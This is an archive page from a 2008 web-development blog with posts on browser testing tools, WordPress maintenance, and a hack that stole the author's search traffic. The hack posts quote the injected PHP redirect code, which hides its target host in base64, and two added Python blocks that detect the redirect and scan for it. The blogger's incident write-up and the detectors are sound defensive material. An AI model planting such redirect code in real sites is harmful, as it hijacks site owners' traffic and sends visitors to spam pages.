jammer(six)

much ado about something…

Archive for the ‘WebDev’ Category

Here’s a quick tip for those of you that need to check web layouts on a variety of platforms/browsers…

If you want to check how your pages look in a variety of Windows-based browsers, check out BrowserShots.org. This is a free service that offers screenshots using a wide variety of browsers on multiple platforms.

This is especially useful for Mac users (such as myself) who need to be sure that things look okay when viewed with Internet Explorer. In fact, I’ve been using it quite heavily over the past few days, as I’ve been working on a new layout for my personal finance and parenting sites. While I’ve used Parallels Desktop to check browser compatibility in the past, BrowserShots gives me access to a much wider variety of browsers. And best of all, it also allows me to stop bugging my Windows-based friends for help — thanks Jim and MBH!

Comments (0) Posted on Sunday, July 6th, 2008

Last night I was messing around with sites and I inadvertently crippled my personal finance site. I’ve created a sandbox of sorts, but it wasn’t working properly. I eventually realized that this was because I hadn’t created an .htaccess file for WordPress to store info about redirects. To make a long story short, I fired up my FTP client and copied the file over — or so I thought.

When I awoke this morning, traffic to FiveCentNickel was low and a quick check of my SiteMeter referral logs revealed that I was barely getting any search traffic. I loaded the front page and all appeared to be fine. I was afraid that I had been hacked (again), but was showing no signs of it aside from a lack of search traffic.

I couldn’t figure out what was going on until I tried clicking an internal link. When I did that, I just got an error instead of the article that I had clicked on. When I dug deeper, I realized that this happened because I had moved my .htaccess file instead of copying it. Aaaargh!

The good news is that I did this late on a Sunday evening, and discovered the problem early Monday morning. There wasn’t much to lose during those few hours. And… I’ve learned a valuable lesson.

Comments (1) Posted on Monday, June 16th, 2008

Apparently the WordPress search redirect hack that I reported on the other day is fairly widespread. Moreover, it’s been taking down sites running WordPress installs as late as ver. 2.5.1, so upgrading won’t necessarily protect you (example).

sidebar: According to Donncha, 2.5.x is not vulnerable to this, but I’ve personally seen a number of 2.5.x sites that are afflicted. One commonality is that many (all?) of these sites are on DreamHost. I wonder if the hackers have somehow compromised DreamHost, and are attacking the 2.5.x installs from the inside (?). Or perhaps they were compromised before upgrading. Just musing — no evidence of that so far. /sidebar

While the nefarious code was, in my case, included in index.php, others are reporting that it may involve a corrupted image file set in the wp_options database table to act as a plugin.

Here are some related articles on the topic: link, link, link

Some DigitalPoint threads: link, link

And some WordPress support threads: link, link

And, finally, video on fixing the problem if you have the plugin version: link

(Thanks to Patrick for the video link.)

It’s still unclear how the affected sites were compromised.

To find out if you’re affected:

Clear cookies, run a Google search for your site, and then click through. If you wind up at your site you’re probably okay. If it redirects to (or through) anyresults.net, then you’ve been hacked. If I were you, I’d try this a couple of times as the cookie that hides the hack seems to stick in some browsers.
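The manual check above can be scripted. This is an added example, not part of the original post: it requests a page twice without cookies, once with a search-engine Referer and once without, and reports an off-site redirect that appears only for the search visit. The Referer value, the host blog.example and the simulated site are assumptions made for the example.

```python
import urllib.error
import urllib.request
from urllib.parse import urlsplit

SEARCH_REFERER = "https://www.google.com/search?q=test"  # assumed value

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # do not follow; urllib then raises HTTPError for the 3xx

def http_fetch(url, headers):
    """Fetch url without cookies; return (status, Location header or None)."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(urllib.request.Request(url, headers=headers), timeout=10) as r:
            return r.status, r.headers.get("Location")
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Location")

def _host(url):
    host = urlsplit(url).hostname or ""
    return host[4:] if host.startswith("www.") else host

def offsite_target(site_url, status, location):
    """Return the foreign host a 3xx response points at, else None."""
    if status not in (301, 302, 303, 307, 308) or not location:
        return None
    target = _host(location)  # empty for a relative Location
    return target if target and target != _host(site_url) else None

def check_cloaked_redirect(url, fetch=http_fetch):
    """Compare a cookieless search click-through with a direct visit."""
    via_search = offsite_target(url, *fetch(url, {"Referer": SEARCH_REFERER}))
    direct = offsite_target(url, *fetch(url, {}))
    # Only a redirect that appears solely for search visitors is the cloak.
    return via_search if via_search and via_search != direct else None

def simulated_infected_site(url, headers):
    """Constructed stand-in for a site carrying the injected redirect."""
    if "google" in headers.get("Referer", "").lower() and "Cookie" not in headers:
        return 302, "http://anyresults.net/"
    return 200, None

if __name__ == "__main__":
    print(check_cloaked_redirect("http://blog.example/", simulated_infected_site))
```

Calling check_cloaked_redirect with only a URL uses the real HTTP fetcher, which sends no cookies and does not follow redirects.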

Update: Be sure to read the GRS post about getting rid of this thing. I just discovered that I had an extraneous user created at 00:00:00 on 0000-00-00. Unlike JD, however, I haven’t discovered any other database changes — perhaps because I was running an older version of WP (2.3.3) which was easier to take down (?).

Comments (7) Posted on Saturday, June 7th, 2008

After yesterday’s excitement with one of my WordPress installs getting hacked, I thought I’d point out this article on securing WordPress. I haven’t read it closely yet, but it looks useful.

Comments (0) Posted on Friday, June 6th, 2008

Something scary happened today over at FiveCentNickel. Around 3:30 EDT today I noticed that traffic to the site was lagging way behind normal. Upon further investigation, I realized that my search traffic had all but dried up. Thinking I had been banned by Google, I dug deeper.

Oddly enough, I still ranked well for all of the terms that had brought me traffic in the past. So what was happening? If I was still ranking well in the SERPs, why weren’t people clicking through?

Unsure of what else to do, I enlisted the help of Jim, Flexo, and Clever Dude and sent a shout out to all who are following me on Twitter. Among other things, I asked these guys to search for a few keywords to see if my rankings were holding up.

My search results were just fine, ruling out the possibility that Google had rolled out new search data that excluded little old me, and it just hadn’t filtered down to our neck of the woods.

And then it happened…

Clever Dude clicked on a Google search result and was redirected elsewhere. But when he clicked it again, all was well. When I reported this via IM to Jim, he checked it out and saw something similar.

As it turns out, I was the victim of a WordPress hack that stole pretty much all of my search traffic, but somehow hid itself using cookies. Upon further inspection, I discovered the following bit of code at the top of index.php:

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

If you hit Google without the cookie and tried to click through to my site, you were directed elsewhere. But once it happened to you once, it couldn’t be repeated until you cleared your cookies. Very sneaky.
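A file-level check for the same injection, as an added example that is not part of the original post: it looks in PHP source for the three traits of the quoted snippet (a Referer test, an empty-cookie test, and a Location header) and decodes any base64 literal so the hidden redirect host becomes readable. The flagging rule and the clean sample file are assumptions made for the example.

```python
import base64
import re
from pathlib import Path

# Indicators taken from the snippet quoted in the post.
REFERER_GATE = re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_REFERER['\"]\s*\]")
COOKIE_GATE = re.compile(r"(?:sizeof|count)\s*\(\s*\$_COOKIE\s*\)\s*==\s*0")
LOCATION = re.compile(r"header\s*\(\s*['\"]Location:", re.IGNORECASE)
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

def scan_php(source):
    """Report which indicators one PHP file's text contains."""
    decoded = []
    for literal in B64_LITERAL.findall(source):
        try:
            raw = base64.b64decode(literal, validate=True)
            decoded.append(raw.decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            decoded.append("<not valid base64>")
    gates = [bool(REFERER_GATE.search(source)), bool(COOKIE_GATE.search(source))]
    redirect = bool(LOCATION.search(source))
    # Assumed rule: a redirect guarded by either gate is worth a manual look.
    return {"referer_gate": gates[0], "cookie_gate": gates[1],
            "redirect": redirect, "decoded": decoded,
            "suspicious": redirect and any(gates)}

def scan_tree(root):
    """Scan every *.php file under root; return {path: finding} for hits."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        finding = scan_php(path.read_text(errors="replace"))
        if finding["suspicious"]:
            hits[str(path)] = finding
    return hits

# Constructed samples: the two lines quoted in the post, and a plain
# WordPress-style index.php written for this example.
INFECTED = r'''$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>'''
CLEAN = r'''<?php
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
'''

if __name__ == "__main__":
    print(scan_php(INFECTED))
    print(scan_php(CLEAN))
```

Run scan_tree against a copy of the WordPress directory; a hit is a prompt to read the file, not proof of compromise.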

So where was all of my traffic going?

It was being shunted through www.anyresults.net (no link for you!) and then winding up at a spammy, ad-filled landing page on www.dealtime.com (again, no link for you — I’ve helped enough today). I suspect that dealtime.com had likewise been compromised, though I can’t say for sure.

I’m still not sure how they got in, but I’ve reported it to my host, cleaned everything up, and changed all of my passwords. For reference, I was running WordPress 2.3.3, though I have since upgraded to WordPress 2.5.1.

Before you ask, yes, I’m aware that I was taking a slight risk by running a slightly older version of WordPress. In my defense, however, early releases of major WordPress updates often have numerous bugs of their own. As such, I typically wait until at least X.X.2 before upgrading unless a serious hole is discovered in the version that I’m currently using.

Update: All WordPress versions appear to be vulnerable.

Guess what? I just found one.

Comments (4) Posted on Thursday, June 5th, 2008

This is a slick little javascript bookmarklet that lists the attributes of various on-page elements:

Mouseover DOM Inspector

Just save it to your bookmarks toolbar (or wherever). When you want to use it, simply click on it and then mouseover the elements you’re curious about. When you’re done, simply hit escape.

This is a pretty nifty little tool for quickly figuring out column widths, etc. when poking around on a site.

Comments (0) Posted on Saturday, May 24th, 2008

Check this out… If you go over to montastic.com you can set up an account and enter any domains that you wish to monitor. You can enter up to 100 domains and, once it’s set up, they’ll periodically ping the sites on your list and e-mail you if there’s a change in status (i.e., site is down, site is back up).

This is a great little set-and-forget tool for alerting you to downtime so you can follow up with your host and get things straightened out. Likewise, if you’re using any affiliate programs, you might want to monitor them to protect against possible outages — this is especially valuable if you’re running pay-per-click campaigns, as downtime = wasted advertising dollars.

The monitoring can be a bit haphazard at times, in that it pings at somewhat random intervals. For example, of the sites that I’m currently tracking, one hasn’t been pinged in four hours whereas all the others have been pinged within the past hour. Regardless, it’s free and easy to use, so you have nothing to lose by setting it up — this is especially true if you use any sort of “budget” web host.

Comments (0) Posted on Tuesday, May 20th, 2008

This is a quick note to WordPress users out there… I have always felt that you should never rely on a plugin to do something that can just as easily be done by hand, especially when it comes to content creation.

Now I have an example to back this up:

wp-table

This is a slick little plugin that creates fancy html tables. The problem, as stated at the top of the download page, is that:

This plugin do not support WordPress 2.5. Currently I don’t plan a new version…

This means that anyone that has relied on this plugin in the past has a choice to make:

(1) Don’t upgrade beyond WordPress 2.3.X
(2) Upgrade, stop using the plugin, and lose all of your tables
(3) Go back and hand-code your tables before upgrading

Fortunately for me, I only played around with this plugin briefly, and had only one table to fix. But if you had relied heavily on this plugin, you’d be in a pretty tough spot right now.

While plugins can be a great tool, it’s important to remember that you’re dependent on the developer to maintain compatibility going forward. Thus, when it comes to content creation, you’re better off biting the bullet and future-proofing your articles from the very beginning rather than relying on third-party add-ons.

Comments (1) Posted on Sunday, May 18th, 2008
